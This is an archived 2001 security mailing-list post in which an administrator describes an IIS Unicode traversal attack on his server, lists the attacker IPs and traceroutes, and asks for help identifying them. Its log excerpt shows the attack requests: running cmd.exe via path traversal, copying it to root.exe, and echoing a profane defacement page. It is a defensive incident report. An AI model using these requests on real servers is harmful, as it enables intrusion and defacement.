who's owning this ip?

From: Thomas Springer (tuevat_private)
Date: Tue May 08 2001 - 09:07:34 PDT

  • Next message: Shaun Dewberry: "Re: homepage worm"

    We had an attacker exploiting unicode on iis5 yesterday - see funny
    chinese-war-pages in the log below. The hacker successfully exploited
    IIS-Unicode bug, created ~100 files but was still too dumb to deface the
    webserver.
    
    The attacker used 208.22.161.15 and 202.97.205.3.
    I tried a trace but ended up with
     ...
     19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
     20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
     21   200 ms   211 ms   220 ms  202.0.170.34
     22   361 ms   370 ms   411 ms  202.0.170.13
     23   370 ms   391 ms   400 ms  202.97.10.193
     24   521 ms   541 ms   551 ms  202.97.10.66
     25   581 ms   601 ms   581 ms  61.138.38.2
     26   721 ms   711 ms   671 ms  61.180.139.202
     27   341 ms   350 ms   351 ms  202.97.205.3
    
    208.22.161.15 seems to end at
    17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net [205.171.17.130]
    18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net [205.171.17.82]
    19     *        *        *     Timeout..
    ....
    
    Any chances to find out, to whom the two ip-adresses belong?
    Any tool that copies cmd.exe to root.exe?
    
    I liked this hack, because nothing happend and people her suddenly develop
    security-awareness. hence, even the servers i begged to secure for weeks
    are patched now.
    BTW it's a german website - nothing to do with an chinese-american spy-wars.
    
    funny hackerworld...
    
    thomas
    
    --- IIS-Logsnip ---
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe
    /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
    ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
    3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
    ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
    ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
    ndex.asp 502 355 423 - - -
    2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
    ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
    3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
    ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
    ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
    ndex.htm 502 355 423 - - -
    
    
    Thomas Springer
    



    This archive was generated by hypermail 2b30 : Thu May 10 2001 - 18:54:07 PDT